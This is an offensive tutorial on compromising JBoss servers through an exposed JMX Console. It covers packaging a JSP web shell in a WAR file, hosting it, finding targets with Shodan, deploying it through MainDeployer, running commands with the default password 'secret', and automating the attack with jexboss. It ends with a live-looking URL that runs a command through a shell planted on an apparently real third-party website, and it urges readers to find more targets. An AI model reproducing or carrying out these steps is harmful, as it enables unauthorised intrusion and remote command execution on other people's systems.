“So many Shells in so little time”
What is Jboss ?
JBoss Application Server (JBoss AS) is an open-source, cross-platform Java application server developed by JBoss, a division of Red Hat Inc. JBoss AS is an open-source implementation of Java 2 Enterprise Edition (J2EE) that is used for implementing Java applications and other Web-based applications and software.
JBoss contains a web accessible administrator page called the JMX Console. The JMX Console is ironically plagued by the same vulnerability as Apache Tomcat Manager because it is often deployed with default, weak, or even no credentials. Also comparable to Apache Tomcat Manager, JBoss allows administrators (and attackers) to upload and publish Web application ARchive (WAR) files remotely through this admin console.
Vulnerable versions -
JBoss Application Server versions: 3, 4, 5 and 6.
Paths to Check -
Manually Exploiting JBoss jmx-console -
- Create the WAR file with our jsp shell
- Hosting the WAR file on a server
- Finding Publicly accessible jmx-console
- Deploy the WAR file
- Accessing the jsp shell
Shodan Dorks -
Create the WAR file with our jsp shell -
I made a repository on GitHub with WAR file
So many shells in so little time. Contribute to Mad-robot/Exploiting-jboss development by creating an account on…
WAR file consist of jsp shell
URL to access the shell -
Hosting the WAR file on a server -
I used python to host it
python -m SimpleHTTPServer 8000
Finding Publicly accessible jmx-console -
Using shodan I found some
It looks like this
Deploy the WAR file -
Navigate to the JMX Console on the target host (http://IP:port/jmx-console/) and search for “service=MainDeployer”.
Now using the “void deploy()” we are going to deploy our WAR file
Since it allows you to enter a URL as a parameter value in java.net.URL. In this field, enter your attack IP and the name of the WAR file in the URL box and then click the “Invoke” button.
If it’s successfully deployed it will show a message like below
Accessing the jsp shell -
Jsp shell on the target can be found at /fs/shell.jsp
Note that the JSP shell from ‘RedTeam Pentesting’ requires a password. By default the password is “secret”
Automating using JexBoss -
joaomatosf wrote a Exploitation Tool for JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.
JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool - joaomatosf/jexboss
python jexboss.py -host http://target_host:8080
https://web.unimeditapetininga.com.br/fs/shell.jsp?pass=secret&cmd=dirGo find some by yourself